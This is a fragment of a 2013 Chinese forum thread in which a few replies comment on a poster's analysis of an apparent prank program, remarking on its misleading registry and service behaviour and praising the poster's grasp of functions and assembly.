嗯。恶搞。注册表和服务那些感觉都是迷惑人的。
wuaixuexi 发表于 2013-7-11 11:35 static/image/common/back.gif
楼主 对函数分析的很透彻 ,对汇编 也很了解 ,支持你
一起加油吧
页:
[1]
2